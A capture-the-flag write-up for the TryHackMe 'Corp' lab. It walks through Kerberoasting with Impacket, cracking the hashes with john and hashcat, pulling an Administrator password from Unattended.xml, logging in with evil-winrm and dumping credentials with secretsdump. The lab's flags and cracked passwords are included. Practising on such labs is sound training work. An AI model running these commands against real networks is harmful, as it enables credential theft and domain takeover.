TL;DR Walkthrough of the Corp TryHackme room.
A full list of our TryHackMe walkthroughs and cheatsheets are here.
Background
This was a pretty simple room, but does serve as a good remind to look for passwords in things like scripts, config files, text files on user’s desktops, command history, Unatended.xml, etc etc.
Naturally we started with a nmap scan before we even looked at the questions.
sudo nmap -sV -O 10.10.201.224
Then we RDPed as the provided username and password.
xfreerdp /v:10.10.201.224 /u:dark /p:_QuejVudId6 /dynamic-resolution— — Topic 2 — -
Just like Linux bash, Windows Powershell saves all previous commands into a file called ConsoleHost_history. This is located at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Access the file and obtain the flag.
Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtflag{a12a41b5f8111327690f836e9b302f0b}
— — Topic 3 — -
I saw these questions covered Kerberoasting, so I checked my notes and ran a Kerberoast attack using the credentials we were provided.
python3 /home/kali/Downloads/impacket/build/scripts-3.9/GetUserSPNs.py -request corp.local/dark -dc-ip 10.10.201.224 -outputfile /home/kali/Downloads/hashes/CorpRoasted
john /home/kali/Downloads/hashes/CorpRoasted - format=krb5tgs - wordlist=/home/kali/Downloads/Wordlists/rockyou.txt
Alternatively we can crack the hash with hashcat via
hashcat -m 13100 /home/kali/Downloads/hashes/CorpRoasted /home/kali/Downloads/Wordlists/rockyou.txt --force
We get fela \ rubenF124
If anyone is curious we ran a lab project awhile back here:
- Setup a legacy service account that was Kerberoastable
- Kerberoasted with Rubeus and Impacket
- Cracked the hash with John and Hashcat
- Showed some common methods to mitigate against Kerberoast attacks.
Hence the Q&A goes:
Lets first enumerate Windows. If we run setspn -T medin -Q */* we can extract all accounts in the SPN.
SPN is the Service Principal Name, and is the mapping between service and account.
Running that command, we find an existing SPN. What user is that for?
fela
Lets use hashcat to bruteforce this password. The type of hash we’re cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100.
hashcat -m 13100 -a 0 hash.txt wordlist — force
Crack the hash. What is the users password in plain text?
rubenF124
Login as this user. What is his flag?
We never actually logged in as this user. Instead we skipped ahead, got the Administrator password, logged in as them, and searched for both flags.
#As Administrator
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String "flag"flag{bde1642535aa396d2439d86fe54a36e4}
— — Task 4 — -
What is the decoded password?
Get-Content C:\Windows\Panther\Unattend\Unattended.xmltqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
Now we have the Administrator’s password, login as them and obtain the last flag.
Run that through https://www.base64decode.org/
#Remember that we have to escape special characters in BASH with a \
evil-winrm -i 10.10.201.224 -u administrator -p tqjJpEX9Qv8ybKI3yHcc\=L\!5e\(\!wW\;\$T
Get-ChildItem
Get-ChildItem ..\Desktop
Get-Content ..\Desktop\flag.txtTHM{g00d_j0b_SYS4DM1n_M4s73R}
Alt:
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String “THM{“
Summary
I was curious searched for that test.ps1 mentioned in the PowerShell command history back in Task 2, but was unable to find anything named test.ps1 or test in the C:\Users.
I ran secretsdump out of curiosity as well.
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc Administrator:tqjJpEX9Qv8ybKI3yHcc\=L\!5e\(\!wW\;\$T@10.10.208.240
All in all this was pretty simple, but more practice is always good.
References
Hashcat modes by hash type cheatsheet: https://hashcat.net/wiki/doku.php?id=example_hashes
